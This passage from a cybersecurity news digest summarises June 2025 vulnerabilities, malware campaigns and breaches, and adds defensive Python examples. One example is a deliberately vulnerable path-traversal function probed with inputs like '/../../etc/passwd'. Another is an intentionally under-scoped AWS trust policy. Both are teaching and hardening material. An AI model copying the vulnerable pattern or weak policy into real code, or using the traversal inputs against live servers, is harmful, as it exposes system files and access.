CVE-2024-42009 RoundCube Webmail Cross-Site Scripting Vulnerability"
https://www.cisa.gov/news-events/alerts/2025/06/09/cisa-adds-two-known-exploited-vulnerabilities-catalog
- Google Patched Bug Leaking Phone Numbers Tied To Accounts
"A vulnerability allowed researchers to brute-force any Google account's recovery phone number simply by knowing their profile name and an easily retrieved partial phone number, creating a massive risk for phishing and SIM-swapping attacks. The attack method involves abusing a now-deprecated JavaScript-disabled version of the Google username recovery form, which lacked modern anti-abuse protections. The flaw was discovered by security researcher BruteCat, the same one who demonstrated in February that it's possible to expose the private email addresses of YouTube accounts."
https://www.bleepingcomputer.com/news/security/google-patched-bug-leaking-phone-numbers-tied-to-accounts/
Malware
- Follow The Smoke | China-Nexus Threat Actors Hammer At The Doors Of Top Tier Targets
"This research outlines threats that SentinelLABS observed and defended against in late 2024 and the first quarter of 2025. This post expands upon previous SentinelLABS research, which provides an overview of threats against cybersecurity vendors, including SentinelOne, ranging from financially motivated crimeware to targeted attacks by nation-state actors. This research focuses specifically on the subset of threats targeting SentinelOne and others that we attribute to China-nexus threat actors."
https://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/
https://www.bleepingcomputer.com/news/security/sentinelone-shares-new-details-on-china-linked-breach-attempt/
https://thehackernews.com/2025/06/over-70-organizations-across-multiple.html
https://www.darkreading.com/remote-workforce/china-hackers-target-sentinelone-purplehaze-attack
https://www.bankinfosecurity.com/sentinelone-sees-no-breach-after-hardware-supplier-hacked-a-28626
https://www.securityweek.com/chinese-espionage-crews-circle-sentinelone-in-year-long-reconnaissance-campaign/
https://hackread.com/chinese-linked-hackers-targeted-global-organizations/
https://www.theregister.com/2025/06/09/china_malware_flip_switch_sentinelone/ - Ransomware Disguised As Password Cracker (Extension Changed To .NS1419)
"The AhnLab SEcurity intelligence Center (ASEC) recently discovered ransomware being distributed disguised a password cracker tool. Such tools are typically used in brute force attacks. Brute force attacks involve by trying every possible combination to find the correct password. Attackers repeatedly attempt to breach a system’s authentication procedure to steal passwords."
https://asec.ahnlab.com/en/88371/
- Two Botnets, One Flaw: Mirai Spreads Through Wazuh Vulnerability
"The Akamai SIRT discovered active exploitation of the remotely executable Wazuh unsafe deserialization vulnerability CVE-2025-24016 in late March 2025, just a few weeks after the vulnerability’s initial disclosure. Although the vulnerability has been public for months now, it has not yet been added to CISA’s Known Exploited Vulnerability (KEV) catalog, nor has active exploitation been previously reported. The Akamai SIRT identified two different botnets leveraging this exploit to spread variants of the Mirai malware to vulnerable target systems."
https://www.akamai.com/blog/security-research/botnets-flaw-mirai-spreads-through-wazuh-vulnerability
https://thehackernews.com/2025/06/botnet-wazuh-server-vulnerability.html
https://www.bankinfosecurity.com/mirai-botnets-exploit-flaw-in-unpatched-wazuh-servers-a-28624
https://www.securityweek.com/mirai-botnets-exploiting-wazuh-security-platform-vulnerability/
- May 2025 Malware Spotlight: SafePay Surges To The Forefront Of Cyber Threats
"Cyber criminals are becoming more brazen, and this month, research highlights the rise of SafePay, a relatively new but increasingly active ransomware group that has quickly established itself as a key player in the cyber crime ecosystem. Meanwhile, FakeUpdates remains a dominant force, continuing to impact global organizations at an alarming rate. The education sector remains the most targeted industry, illustrating persistent vulnerabilities across institutions."
https://blog.checkpoint.com/research/may-2025-malware-spotlight-safepay-surges-to-the-forefront-of-cyber-threats/
- Sleep With One Eye Open: How Librarian Ghouls Steal Data By Night
"Librarian Ghouls, also known as “Rare Werewolf” and “Rezet”, is an APT group that targets entities in Russia and the CIS. Other security vendors are also monitoring this APT and releasing analyses of its campaigns. The group has remained active through May 2025, consistently targeting Russian companies. A distinctive feature of this threat is that the attackers favor using legitimate third-party software over developing their own malicious binaries. The malicious functionality of the campaign described in this article is implemented through command files and PowerShell scripts. The attackers establish remote access to the victim’s device, steal credentials, and deploy an XMRig crypto miner in the system."
https://securelist.com/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto/116536/
https://www.darkreading.com/cyberattacks-data-breaches/librarian-ghouls-cyberattackers-strike
- DanaBleed: DanaBot C2 Server Memory Leak Bug
"DanaBot is a Malware-as-a-Service (MaaS) platform that has been active since 2018. DanaBot operates on an affiliate model, where the malware developer sells access to customers who then distribute and use the malware for activities like credential theft and banking fraud. The developer is responsible for creating the malware, maintaining the command-and-control (C2) infrastructure, and providing operational support. DanaBot has been involved in several high-profile campaigns, such as a supply chain attack on popular NPM packages and a Distributed Denial-of-Service (DDoS) attack against the Ukrainian Ministry of Defense during the 2022 Russian invasion."
https://www.zscaler.com/blogs/security-research/danableed-danabot-c2-server-memory-leak-bug
- New Hacker Group Uses LockBit Ransomware Variant To Target Russian Companies
"A financially motivated cybercrime group dubbed DarkGaboon has been targeting Russian companies in a series of ransomware attacks, researchers have found. The group was first identified by Russian cybersecurity firm Positive Technologies in January, but researchers have traced its operations back to 2023. Since then, DarkGaboon has targeted Russian organizations across various sectors, including banking, retail, tourism and public services. Positive Technologies was sanctioned by the U.S. in 2021 for allegedly providing IT support to Russia's civilian and military intelligence agencies."
https://therecord.media/new-hacker-group-lockbit-target-russia
Breaches/Hacks/Leaks
- Stolen Ticketmaster Data From Snowflake Attacks Briefly For Sale Again
"The Arkana Security extortion gang briefly listed over the weekend what appeared to be newly stolen Ticketmaster data but is instead the data stolen during the 2024 Snowflake data theft attacks. The extortion group posted screenshots of the allegedly stolen data, advertising over 569 GB of Ticketmaster data for sale, causing speculation that this was a new breach."
https://www.bleepingcomputer.com/news/security/stolen-ticketmaster-data-from-snowflake-attacks-briefly-for-sale-again/
- Sensata Technologies Says Personal Data Stolen By Ransomware Gang
"Sensata Technologies is warning former and current employees it suffered a data breach after concluding an investigation into an April ransomware attack. Sensata is a global industrial tech firm specializing in mission‑critical sensors, controls, and electrical protection systems. It serves the automotive, aerospace, and defense industries, among others, and has an annual revenue of over $4 billion. In April, the company filed an 8-K filing with the U.S. Securities and Exchange Commission (SEC), disclosing that it suffered a ransomware attack on Sunday, April 6, which also included data theft."
https://www.bleepingcomputer.com/news/security/sensata-technologies-says-personal-data-stolen-by-ransomware-gang/
- Grocery Wholesale Giant United Natural Foods Hit By Cyberattack
"United Natural Foods (UNFI), North America's largest publicly traded wholesale distributor, was forced to shut down some systems following a recent cyberattack. The Rhode Island-based company operates 53 distribution centers and delivers fresh and frozen products to over 30,000 locations across the United States and Canada, including supermarket chains, e-commerce providers, natural product superstores, independent retailers, and food service customers. UNFI, a primary distributor for Amazon's Whole Foods, reported $31 billion in annual revenues in August 2024, works with more than 11,000 suppliers, and has over 28,000 employees."
https://www.bleepingcomputer.com/news/security/grocery-wholesale-giant-united-natural-foods-hit-by-cyberattack/
https://therecord.media/major-food-wholesaler-cyberattack-impacting-distribution
https://www.bankinfosecurity.com/whole-foods-supplier-faces-cyberattack-disrupting-operations-a-28629
https://cyberscoop.com/united-natural-foods-whole-foods-distributor-cyberattack/
https://www.theregister.com/2025/06/09/united_natural_foods_cyber_incident/
- The Force That Surrounds Us: The AI Supply Chain From My Jedai To Canva
"UpGuard can now report that it has secured a Chroma database belonging to My Jedai, an AI chatbot company based in Russia. The database contained 341 collections of documents, where each collection could be used to guide responses for different chatbots. Many of the collections contained non-sensitive public data, but some contained private information. Most significantly, one collection contained thousands of responses to a survey of 571 participants in the Canva Creators program, including their email address, country of residence, rating for different components of the Creators program, and descriptions of their specific experiences and challenges with the program."
https://www.upguard.com/breaches/chroma-my-jedai-canva
https://hackread.com/limited-canva-creator-data-expose-ai-chatbot-database/
- Nearly 300,000 Crash Records Stolen From Texas Transportation Department
"State agencies in Texas and Illinois released warnings in recent days about data breaches affecting the sensitive information of thousands of people. Texas said hackers compromised an account at the Department of Transportation (TxDOT) and discovered unusual activity on May 12 involving its Crash Records Information System (CRIS). An investigation found that the compromised account was used to access and download almost 300,000 crash reports. Texas is legally required to maintain CRIS, which tracks all details of crashes and the people involved."
https://therecord.media/car-crash-records-stolen-texas-transportation-department
General News
- Balancing Cybersecurity And Client Experience For High-Net-Worth Clients
"In this Help Net Security interview, Renana Friedlich-Barsky, EVP and CISO at LPL Financial, discusses how threat actors are targeting high-net-worth clients and exploiting digital touchpoints in wealth management. She explains why firms must embed security from the start to protect sensitive assets and ensure seamless, secure client experiences."
https://www.helpnetsecurity.com/2025/06/09/renana-friedlich-barsky-lpl-financial-wealth-management-cybersecurity/
- CISOs, Are You Ready For Cyber Threats In Biotech?
"The threat landscape in the bioeconomy is different from what most CISOs are used to. It includes traditional risks like data breaches, but the consequences are more complex. A compromise of genomic databases, for example, does not just expose personal health data. It can also leak proprietary genetic sequences that represent years of research and investment. These are not just privacy violations; they are breaches that can cripple a business’s future R&D pipeline. One example is the breach at 23andMe, where attackers accessed genetic data of millions of users through credential stuffing."
https://www.helpnetsecurity.com/2025/06/09/cyberbiosecurity-ciso-cyber-threats/
- Enterprise SIEMs Miss 79% Of Known MITRE ATT&CK Techniques
"Using the MITRE ATT&CK framework as a baseline, organizations are generally improving year-over-year in understanding security information and event management (SIEM) detection coverage and quality, but plenty of room for improvement remains, according to CardinalOps."
https://www.helpnetsecurity.com/2025/06/09/siem-detection-coverage/
https://cardinalops.com/white-papers/2025-state-of-siem-report-download/
https://www.darkreading.com/cybersecurity-operations/siems-missing-mark-mitre-techniques
- Employees Repeatedly Fall For Vendor Email Compromise Attacks
"In just 12 months, attackers attempted to steal more than $300 million via vendor email compromise (VEC), with 7% of engagements coming from employees who had engaged with a previous attack, according to Abnormal AI. Employees struggle to differentiate between legitimate messages and attacks, especially when those emails appear to come from a trusted vendor. Employees in the largest organizations, with workforces of 50,000 or more, had the highest rate of second-step engagement with VEC."
https://www.helpnetsecurity.com/2025/06/09/vendor-email-compromise-attacks-vec/
- Disrupting Malicious Uses Of AI: June 2025
"Our mission is to ensure that artificial general intelligence benefits all of humanity. We advance this mission by deploying our innovations to build AI tools that help people solve really hard problems. As we laid out in our submission to the Office of Science and Technology Policy’s U.S. AI Action Plan in March, we believe that making sure AI benefits the most people possible means enabling AI through common-sense rules aimed at protecting people from actual harms, and building democratic AI. This includes preventing the use of AI tools by authoritarian regimes to amass power and control their citizens, or to threaten or coerce other states; as well as activities such as covert influence operations (IO), child exploitation, scams, spam, and malicious cyber activity."
https://openai.com/global-affairs/disrupting-malicious-uses-of-ai-june-2025/
https://thehackernews.com/2025/06/openai-bans-chatgpt-accounts-used-by.html
https://securityaffairs.com/178797/intelligence/openai-bans-chatgpt-accounts-linked-to-russian-chinese-cyber-ops.html
- Next-Gen Developers Are a Cybersecurity Powder Keg
"Media rumblings of industry disruption usually surface in the form of life-changing, convenient tech offerings that promise to add more convenience, comfort, or advancement to our lives. Companies like Amazon, OpenAI, and Uber have shaped their entire ethos around similar principles, and they are among the first disruptors that come to mind for many."
https://www.darkreading.com/application-security/next-gen-developers-cybersecurity-powder-keg
- EU Launches EU-Based, Privacy-Focused DNS Resolution Service
"DNS4EU is an initiative co-funded by the European Union and supported by the European Union Agency for Cybersecurity (ENISA), though the service is expected to be commercialised, “since it has to be sustainable without operational costs from the EU after 2025.”"
https://www.helpnetsecurity.com/2025/06/09/eu-launches-eu-based-privacy-focused-dns-resolution-service/
- Chinese Hackers And User Lapses Turn Smartphones Into a ‘Mobile Security Crisis’
"Cybersecurity investigators noticed a highly unusual software crash — it was affecting a small number of smartphones belonging to people who worked in government, politics, tech and journalism. The crashes, which began late last year and carried into 2025, were the tipoff to a sophisticated cyberattack that may have allowed hackers to infiltrate a phone without a single click from the user."
https://www.securityweek.com/chinese-hackers-and-user-lapses-turn-smartphones-into-a-mobile-security-crisis/
- Spyware Maker Cuts Ties With Italy After Government Refused Audit Into Hack Of Journalist’s Phone
"The spyware manufacturer Paragon said Monday that it has ended its contract with Italy because a special government committee investigating alleged abuses there declined to let the company independently verify that Italian authorities did not hack into the phone of a well-known journalist. "The company offered both the Italian government and parliament a way to determine whether its system had been used against the journalist," Paragon said in a statement issued to the Israeli publication Haaretz. Because Italian authorities “chose not to proceed with this solution, Paragon terminated its contracts in Italy,” the company said."
https://therecord.media/paragon-spyware-maker-cuts-ties-italy-government
- Kazakhstan Detains Over 140 For Allegedly Selling Citizens’ Data Via Telegram Channels
"Kazakh authorities said they busted a network that was using Telegram to illegally sell citizens’ personal data extracted from government databases. More than 140 suspects were arrested in connection with the scheme, including business owners and alleged administrators of Telegram channels used to trade the stolen information, officials said on Monday. Authorities reported that some of the extracted data was shared with debt collection agencies, several of which were searched during the operation. The government seized more than 400 computers and other electronic devices believed to have been used in the illegal activity."
https://therecord.media/kazakhstan-arrests-suspects-stolen-data-network
- Roles Here? Roles There? Roles Anywhere: Exploring The Security Of AWS IAM Roles Anywhere
"As organizations depend more on applications, devices and services to interact across hybrid environments, non-human identities are becoming more common. To enable secure access for these identities within the organization, Amazon Web Services (AWS) has introduced the AWS Identity and Access Management (IAM) Roles Anywhere service that allows workloads outside of AWS to authenticate using digital certificates instead of traditional access keys."
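Certificate-based authentication only replaces long-lived access keys safely if the role's trust policy is scoped to the intended trust anchor and to the certificate attributes Roles Anywhere exposes as session tags. The following is an added example, not code from the Unit 42 research or from AWS: a weak trust policy next to a hardened one, plus a small linter that flags the weak shape. Account ID, region, trust-anchor ID and the CN value are placeholders.

```python
# Added example: two constructed IAM role trust policies for a role assumed via
# IAM Roles Anywhere, and a linter that flags the under-scoped one.
# Account 111122223333, the trust-anchor ID and the CN are placeholders.
ROLES_ANYWHERE_PRINCIPAL = "rolesanywhere.amazonaws.com"
ROLES_ANYWHERE_ACTIONS = ["sts:AssumeRole", "sts:TagSession", "sts:SetSourceIdentity"]

# Weak: any trust anchor that can reach this service principal, and any certificate
# chaining to that anchor's CA, may assume the role.
WEAK_TRUST_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"Service": ROLES_ANYWHERE_PRINCIPAL},
        "Action": ROLES_ANYWHERE_ACTIONS,
    }],
}

# Hardened: pinned to one trust anchor ARN and to one certificate subject CN,
# which Roles Anywhere surfaces as the session tag x509Subject/CN.
HARDENED_TRUST_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"Service": ROLES_ANYWHERE_PRINCIPAL},
        "Action": ROLES_ANYWHERE_ACTIONS,
        "Condition": {
            "ArnEquals": {
                "aws:SourceArn": "arn:aws:rolesanywhere:us-east-1:111122223333:"
                                 "trust-anchor/00000000-0000-0000-0000-000000000000"
            },
            "StringEquals": {
                "aws:PrincipalTag/x509Subject/CN": "build-runner-01.example.internal"
            },
        },
    }],
}

SOURCE_SCOPING_KEYS = {"aws:sourcearn", "aws:sourceaccount"}


def _service_principals(stmt):
    svc = stmt.get("Principal", {}).get("Service", [])
    return [svc] if isinstance(svc, str) else list(svc)


def _condition_keys(stmt):
    # Condition is {operator: {key: value}}; collect every key, case-insensitively.
    keys = set()
    for operator_block in stmt.get("Condition", {}).values():
        keys.update(k.lower() for k in operator_block)
    return keys


def lint_trust_policy(policy):
    """Return human-readable findings for Allow statements that trust Roles Anywhere
    without pinning the trust anchor or the certificate identity."""
    findings = []
    for index, stmt in enumerate(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        if ROLES_ANYWHERE_PRINCIPAL not in _service_principals(stmt):
            continue
        keys = _condition_keys(stmt)
        if not keys & SOURCE_SCOPING_KEYS:
            findings.append(
                f"statement {index}: no aws:SourceArn/aws:SourceAccount condition; "
                "the role is not pinned to a specific trust anchor")
        if not any(k.startswith("aws:principaltag/x509") for k in keys):
            findings.append(
                f"statement {index}: no aws:PrincipalTag/x509* condition; every "
                "certificate issued under the trust anchor CA can assume the role")
    return findings


if __name__ == "__main__":
    for name, policy in (("weak", WEAK_TRUST_POLICY), ("hardened", HARDENED_TRUST_POLICY)):
        print(name, lint_trust_policy(policy) or ["ok"])
```

The linter only checks structure; whether the CA behind the trust anchor is itself tightly controlled (who can get a certificate issued with that CN) is the other half of the review.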
https://unit42.paloaltonetworks.com/aws-roles-anywhere/
- DragonForce Ransomware Cartel Vs. Everybody
"The story of the DragonForce Ransomware Cartel (DFRC, DragonForce) begins somewhere, but researchers can’t agree whether it started as a hacktivist group, a distinct new group, or a little of each. In fact, the more you dig into DFRC, the more obfuscated it becomes. It’s hard to find all the cool family history details in this story, and that’s exactly how they like it."
https://blog.barracuda.com/2025/06/09/dragonforce-ransomware-cartel-vs--everybody
Reference
Electronic Transactions Development Agency (ETDA)
- Fiddleitm: Open-Source Mitmproxy Add-On Identifies Malicious Web Traffic
Cyber Threat Intelligence 09 June 2025
Healthcare Sector
- Healthcare Organizations Are At a Turning Point With AI
"32% of healthcare executives say their organization suffered a breach in the past 12 months, and 46% say they are experiencing a higher volume of attacks, according to LevelBlue. As AI promises healthcare organizations efficiency, optimized processes, and enhanced automation, the report reveals that only 29% of healthcare executives say they are prepared for AI-powered threats despite 41% believing they will happen. 32% feel their organization is prepared for deepfake attacks, even though 49% are expecting them."
https://www.helpnetsecurity.com/2025/06/05/healthcare-ai-powered-threats/
Industrial Sector
- Hitachi Energy Relion 670, 650 Series And SAM600-IO Product
"Successful exploitation of these vulnerabilities could allow an attacker to cause memory corruption on the products."
https://www.cisa.gov/news-events/ics-advisories/icsa-25-155-02
- CyberData 011209 SIP Emergency Intercom
"Successful exploitation of these vulnerabilities could allow an attacker to disclose sensitive information, cause a denial-of-service condition, or achieve code execution."
https://www.cisa.gov/news-events/ics-advisories/icsa-25-155-01
- Turning Off The (Information) Flow: Working With The EPA To Secure Hundreds Of Exposed Water HMIs
"Many like to discuss internet-connected Industrial Control Systems (ICS) as the pinnacle of high-value targets, given that it is often the infrastructure we all rely on to live. In internet terms, “ICS” is typically used interchangeably with “Critical Infrastructure” because we tend to categorize these types of services and hosts based on the underlying protocols they run. The reality is much more nuanced than this; sure, around fifty thousand hosts may be running a well-known ICS protocol like Modbus, but that doesn’t make all of the hosts running Modbus “critical infrastructure”. For all we know, those services may just be some person’s Lego Mindstorm project connected to an Arduino via a serial adapter. To classify a host with an ICS service as critical infrastructure, one needs context regarding that service."
https://censys.com/blog/turning-off-the-information-flow-working-with-the-epa-to-secure-hundreds-of-exposed-water-hmis
https://www.securityweek.com/misconfigured-hmis-expose-us-water-systems-to-anyone-with-a-browser/
New Tooling
- Meta Open-Sources AI Tool To Automatically Classify Sensitive Documents
"Meta has released an open source AI tool called Automated Sensitive Document Classification. It was originally built for internal use and is designed to find sensitive information in documents and apply security labels automatically. The tool uses customizable classification rules and works with files that contain readable text. Once labeled, the documents can be protected from unauthorized access or excluded from AI systems that use retrieval-augmented generation (RAG)."
https://www.helpnetsecurity.com/2025/06/05/meta-open-source-automated-sensitive-document-classification-tool/
https://github.com/meta-llama/PurpleLlama/tree/main/SensitiveDocClassification
Vulnerabilities
- AI Kept 15-Year-Old Zombie Vuln Alive, But Its Time Is Drawing Near
"A security bug that surfaced fifteen years ago in a public post on GitHub has survived developers' attempts on its life. Despite multiple developer warnings about the 2010 GitHub Gist containing the path traversal vulnerability in 2012, 2014, and 2018, the flaw appeared in MDN Web Docs documentation and a Stack Overflow snippet. From there, it took up residence in large language models (LLMs) trained on the flawed examples."
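The snippet the article traces through GitHub, MDN, Stack Overflow and LLM training data is a static-file handler that joins the request path onto the web root and trusts the result. The following is an added example, not the original gist or code from the paper: the same bug class in Python, beside the containment check that stops it. WEB_ROOT is an assumption and nothing is read from disk; the functions only compute the path a server would open.

```python
import posixpath
from urllib.parse import unquote

# Added example of the path-traversal pattern discussed above, written in
# Python rather than the original JavaScript. WEB_ROOT is an assumption.
WEB_ROOT = "/srv/www/public"


def resolve_vulnerable(url_path: str) -> str:
    """The copy-pasted pattern: web root + request path, no containment check.
    '..' segments in url_path walk straight out of WEB_ROOT."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, url_path.lstrip("/")))


def resolve_hardened(url_path: str):
    """Decode percent-encoding first (so %2e%2e%2f is seen as ../), normalise,
    then require the result to still sit under WEB_ROOT. Returns None when the
    request would escape the root; the caller should answer 403 or 404."""
    decoded = unquote(url_path)
    if "\x00" in decoded:  # NUL bytes truncate paths in C-backed file APIs
        return None
    root = posixpath.normpath(WEB_ROOT)
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    # commonpath compares whole path components; a plain startswith(root) would
    # wrongly accept /srv/www/public-old/secret as being under /srv/www/public.
    if posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    for req in ("/index.html", "/../../etc/passwd", "/%2e%2e/%2e%2e/etc/passwd"):
        print(f"{req!r:32} vulnerable -> {resolve_vulnerable(req)}")
        print(f"{'':32} hardened   -> {resolve_hardened(req)}")
```

If the real handler later follows symlinks, resolve with os.path.realpath before the commonpath check as well, since a link inside the root can point outside it.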
https://www.theregister.com/2025/06/05/llm_kept_persistent_path_traversal_bug_alive/
https://arxiv.org/abs/2505.20186
- CISA Adds One Known Exploited Vulnerability To Catalog
"CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
CVE-2025-5419 Google Chromium V8 Out-of-Bounds Read and Write Vulnerability"
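A KEV addition is only useful if it is matched against what is actually deployed and its remediation due date is tracked. The following is an added example, not CISA's or any vendor's code: it parses a feed in the shape of the KEV JSON export and cross-references a scanner inventory. The feed sample is constructed; only CVE-2025-5419 comes from the alert above, CVE-2017-0199 and CVE-2025-24016 are taken from other items in this digest, and the due dates and asset names are illustrative.

```python
import json
from datetime import date

# Constructed sample in the shape of CISA's KEV JSON feed
# (https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json).
# Entry contents and dates are illustrative, not copied from the live catalog.
SAMPLE_KEV_FEED = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "catalogVersion": "2025.06.05",
    "count": 2,
    "vulnerabilities": [
        {
            "cveID": "CVE-2025-5419",
            "vendorProject": "Google",
            "product": "Chromium V8",
            "vulnerabilityName": "Google Chromium V8 Out-of-Bounds Read and Write Vulnerability",
            "dateAdded": "2025-06-05",
            "requiredAction": "Apply mitigations per vendor instructions.",
            "dueDate": "2025-06-26",
            "knownRansomwareCampaignUse": "Unknown",
        },
        {
            "cveID": "CVE-2017-0199",
            "vendorProject": "Microsoft",
            "product": "Office",
            "vulnerabilityName": "Microsoft Office and WordPad Remote Code Execution Vulnerability",
            "dateAdded": "2021-11-03",
            "requiredAction": "Apply updates per vendor instructions.",
            "dueDate": "2022-05-03",
            "knownRansomwareCampaignUse": "Known",
        },
    ],
})

# Constructed scanner output: CVE -> assets where it was found. CVE-2025-24016
# (Wazuh) is deliberately absent from the sample feed, mirroring the Akamai
# item in this digest that notes it was not yet catalogued.
SAMPLE_INVENTORY = {
    "CVE-2025-5419": ["ws-0412", "ws-0077"],
    "cve-2017-0199": ["fileserver-legacy"],
    "CVE-2025-24016": ["siem-wazuh-01"],
}


def load_kev(feed_text: str) -> dict:
    """Index the feed by upper-cased CVE id."""
    data = json.loads(feed_text)
    return {entry["cveID"].upper(): entry for entry in data["vulnerabilities"]}


def triage(feed_text: str, inventory: dict, today) -> list:
    """Return one record per inventory CVE present in KEV, most urgent first
    (overdue items first, ransomware-linked items ahead of others on a tie)."""
    if isinstance(today, str):
        today = date.fromisoformat(today)
    kev = load_kev(feed_text)
    hits = []
    for cve, assets in inventory.items():
        entry = kev.get(cve.upper())
        if entry is None:
            continue  # not in KEV: still patch it, but it is outside this SLA view
        due = date.fromisoformat(entry["dueDate"])
        hits.append({
            "cve": entry["cveID"],
            "product": entry["product"],
            "due": entry["dueDate"],
            "days_left": (due - today).days,
            "ransomware": entry["knownRansomwareCampaignUse"] == "Known",
            "assets": sorted(assets),
        })
    hits.sort(key=lambda h: (h["days_left"], not h["ransomware"]))
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_KEV_FEED, SAMPLE_INVENTORY, "2025-06-09"):
        state = "OVERDUE" if hit["days_left"] < 0 else f"{hit['days_left']}d left"
        print(f"{hit['cve']:15} {hit['product']:12} due {hit['due']} ({state}) -> {hit['assets']}")
```

The KEV due date is the federal BOD 22-01 deadline; treat it as an upper bound, not a target, and note that a CVE missing from the catalog (here CVE-2025-24016) can still be actively exploited.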
https://www.cisa.gov/news-events/alerts/2025/06/05/cisa-adds-one-known-exploited-vulnerability-catalog
https://securityaffairs.com/178678/security/u-s-cisa-google-chromium-v8-flaw-known-exploited-vulnerabilities-catalog.html
- Questions Swirl Around ConnectWise Flaw Used In Attacks
"A week after ConnectWise disclosed that a threat actor had gained access to its environment and targeted customers, questions remain about the vulnerability used by the attacker, and confusion remains as to the timeline of the attacks. Last week, ConnectWise revealed that its environment had been breached by a suspected nation-state actor. "ConnectWise recently learned of suspicious activity within our environment that we believe was tied to a sophisticated nation state actor, which affected a very small number of ScreenConnect customers," the company said in a May 28 advisory."
https://www.darkreading.com/remote-workforce/questions-swirl-connectwise-flaw-attacks
Malware
- Hacker Selling Critical Roundcube Webmail Exploit As Tech Info Disclosed
"Hackers are likely starting to exploit CVE-2025-49113, a critical vulnerability in the widely used Roundcube open-source webmail application that allows remote execution. The security issue has been present in Roundcube for over a decade and impacts versions of Roundcube webmail 1.1.0 through 1.6.10. It received a patch on June 1st. It took attackers just a couple of days to reverse engineer the fix, weaponize the vulnerability, and start selling a working exploit on at least one hacker forum."
https://www.bleepingcomputer.com/news/security/hacker-selling-critical-roundcube-webmail-exploit-as-tech-info-disclosed/
- FBI: BADBOX 2.0 Android Malware Infects Millions Of Consumer Devices
"The FBI is warning that the BADBOX 2.0 malware campaign has infected over 1 million home Internet-connected devices, converting consumer electronics into residential proxies that are used for malicious activity. The BADBOX botnet is commonly found on Chinese Android-based smart TVs, streaming boxes, projectors, tablets, and other Internet of Things (IoT) devices. "The BADBOX 2.0 botnet consists of millions of infected devices and maintains numerous backdoors to proxy services that cyber criminal actors exploit by either selling or providing free access to compromised home networks to be used for various criminal activity," warns the FBI."
https://www.bleepingcomputer.com/news/security/fbi-badbox-20-android-malware-infects-millions-of-consumer-devices/
https://www.ic3.gov/PSA/2025/PSA250605
- BladedFeline: Whispering In The Dark
"In 2024, ESET researchers discovered several malicious tools in the systems used by Kurdish and Iraqi government officials. The APT group behind the attacks is BladedFeline, an Iranian threat actor that has been active since at least 2017, when it compromised officials within the Kurdistan Regional Government (KRG). This group develops malware for maintaining and expanding access within organizations in Iraq and the KRG. While this is our first blogpost covering BladedFeline, we discovered the group in 2023, after it targeted Kurdish diplomatic officials with the Shahmaran backdoor, and previously reported on its activities in ESET APT Activity reports Q4 2023-Q1 2024 and Q2 2024-Q3 2024."
https://www.welivesecurity.com/en/eset-research/bladedfeline-whispering-dark/
https://www.darkreading.com/threat-intelligence/iranian-apt-bladedfeline-hides-network-8-years
https://thehackernews.com/2025/06/iran-linked-bladedfeline-hits-iraqi-and.html
https://therecord.media/iran-linked-hackers-target-kurdish-iraq-cyber-espionage
https://www.bankinfosecurity.com/iranian-espionage-group-caught-spying-on-kurdish-officials-a-28602
- Newly Identified Wiper Malware “PathWiper” Targets Critical Infrastructure In Ukraine
"Cisco Talos observed a destructive attack on a critical infrastructure entity within Ukraine, using a previously unknown wiper we are calling “PathWiper”. The attack was instrumented via a legitimate endpoint administration framework, indicating that the attackers likely had access to the administrative console, which was then used to issue malicious commands and deploy PathWiper across connected endpoints. Talos attributes this disruptive attack and the associated wiper to a Russia-nexus advanced persistent threat (APT) actor. Our assessment is made with high confidence based on tactics, techniques and procedures (TTPs) and wiper capabilities overlapping with destructive malware previously seen targeting Ukrainian entities."
https://blog.talosintelligence.com/pathwiper-targets-ukraine/
https://www.darkreading.com/cyberattacks-data-breaches/pathwiper-attack-critical-infrastructure-ukraine
- How a Malicious Excel File (CVE-2017-0199) Delivers The FormBook Payload
"FortiGuard Labs recently observed a high-severity phishing campaign targeting users of older Office application versions through malicious email attachments. The emails deliver an Excel file designed to exploit the CVE-2017-0199 vulnerability, a known flaw in the OLE (Object Linking and Embedding) functionality of older Microsoft Office versions. The malware being spread in this campaign is FormBook, an information-stealing malware known for its ability to capture sensitive data, including login credentials, keystrokes, and clipboard information. Upon opening the malicious Excel file, the malware performs a series of operations, ultimately running the FormBook payload."
https://www.fortinet.com/blog/threat-research/how-a-malicious-excel-file-cve-2017-0199-delivers-the-formbook-payload
- TTPs Of Cyber Partisans Activity Aimed At Espionage And Disruption
"Cyber Partisans is a hacktivist group that became known in 2020. The group is very active in the media, claiming multiple attacks on government agencies and industrial enterprises, the purpose of which is to steal confidential information and destabilize the IT infrastructure of the targeted organization. Kaspersky ICS CERT experts managed to identify the attack vector, as well as find and analyze the malware and utilities most probably used by the actors in the recent series of attacks on industrial enterprises and government agencies in Russia and Belarus."
https://ics-cert.kaspersky.com/publications/reports/2025/06/05/ttps-of-cyber-partisans-activity-aimed-at-espionage-and-disruption/
- Decoding ‘ClickFix’: Lessons From The Latest Browser-Based Phish
"ClickFix is a social engineering attack that tricks users into running malicious commands on their own devices – all under the guise of a routine security check. Disguised as something familiar, like a Cloudflare CAPTCHA, it convinces users to copy and paste dangerous code without realizing the risk. We’ll break down how ClickFix works, examine a real-world example, and explore why this surprisingly simple tactic remains effective."
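Because the victim types or pastes the command themselves, the endpoint artefact ClickFix leaves is an interpreter (PowerShell, mshta, cmd) spawned by the interactive shell with a download-and-execute one-liner, often carrying the fake CAPTCHA text as a trailing comment. The following is an added example, not code from SlashNext or from any detection product: a scoring rule run over constructed process-creation events in the style of Sysmon Event ID 1. The events, the 203.0.113.0/24 addresses (documentation range) and the threshold are all assumptions.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields). Not real
# telemetry; 203.0.113.x is the IETF documentation range.
SAMPLE_EVENTS = [
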